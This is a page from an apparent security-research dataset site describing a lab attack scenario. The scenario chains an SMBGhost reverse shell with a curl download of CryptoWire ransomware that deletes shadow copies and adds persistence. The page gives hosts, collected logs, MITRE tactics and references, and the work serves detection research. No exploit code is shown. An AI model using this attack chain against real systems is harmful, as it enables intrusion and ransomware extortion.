• Home
  • Attack
  • Dataset
  • Contact Us
        • T1-24–01–S–N–CL
        • T2-24–01–S–N–CL
        • T3-24–01–S–N–CL
        • T4-24–01–S–E–M
        • T5-24–01–S–E–LM
        • T6-24–01–S–E–FH
        • T7-24–01–M–NE–CLM
        • T8-24–01–M–NE–CFHL
        • T9-24–01–M–NE–CLM
        • T1-24–02–S–N–CIKM
        • T2-24–02–S–N–CL
        • T3-24–02–S–N–CL
        • T4-24-02-S-E-M
        • T5-24-02-S-E-DL
        • T6-24-02-S-E-DEGN
        • T7-24-02-M-NE-CDEGLN
        • T8-24-02-M-NE-CDL
        • T9-24-02-M-NE-CLH
  • T9-24–01–M–NE–CLM
  • SMBGhost + Ransomware

    This attack is a combination of T2-24-01-S-N-CL and T4-24–01–S–E–M and three logs collected: two pcap and one evtx.

    1. Reverse Shell Connection by exploiting SMBGhost Vulnerability
    2. Download Ransomware and add in the registry
    3. Execute Ransomware and infect after rebooting the victim PC

    The attacker performs a reverse shell connection via the Windows 10 SMB vulnerability using a T2-24-01-S-N-CL attack. Using curl commands the attacker downloads and exectes CryptoWire ransomware in T4-24-01-S-E-M. In addition to encrypting the home directory, the ransomware performs additional behaviors, such as deleting Volume Shadow and registering a Scheduler, and demands a ransom for decryption.
  •  


  • OS IP Software Log collection
    time
    Program
    runtime
    Attacker Windows 11 192.168.56.1 - 160 sec 200 sec
    Victim Windows 10(1903) 192.168.56.112 (Internal)
    10.0.3.15 (External)
    SMB

  • Installing
  • python3 -m pip install -r requirements.txt

  • Using
  • python3 run.py

  • MITRE ATT&CK Framework
  • Attack Tactic
    Reconnaissance Resource Development Initial Access Execution Persistence Privilege Escalation Defense Evasion
    Credential Discovery Lateral Movement Collection Command and Control Exfiltration Impact

  • Logs
  • ./log/2024_01_T9_{time}.evtx # YYmmdd_HHMMSS
    ./log/2024_01_T9_{time}_1.pcap # YYmmdd_HHMMSS
    ./log/2024_01_T9_{time}_2.pcap # YYmmdd_HHMMSS



  • References
  • [1] NIST [CVE-2020-0796]
    [2] ZecOps [CVE-2020-0796 Remote Code Execution POC]
    [3] Ahnlab ASEC [CryptoWire with Decryption Key Included]
    [4] VirusTotal [bcf4ad8687af0d79971e5f73ab152b7732bf3540726f71654da87f36e54cff6f]
    [5] GitHub [CryptoWire Open Source]

  • ※ Click on the attack name to see a description and scenario for the attack
    • 2024 01
    • T1-24–01–S–N–CL
    • T2-24–01–S–N–CL
    • T3-24–01–S–N–CL
    • T4-24–01–S–E–M
    • T5-24–01–S–E–LM
    • T6-24–01–S–E–FH
    • T7-24–01–M–NE–CLM
    • T8-24–01–M–NE–CFHL
    • T9-24–01–M–NE–CLM
  • Copyright(C) 2024, KAIST Cyber Security Reserch Center. All Rights Reserved.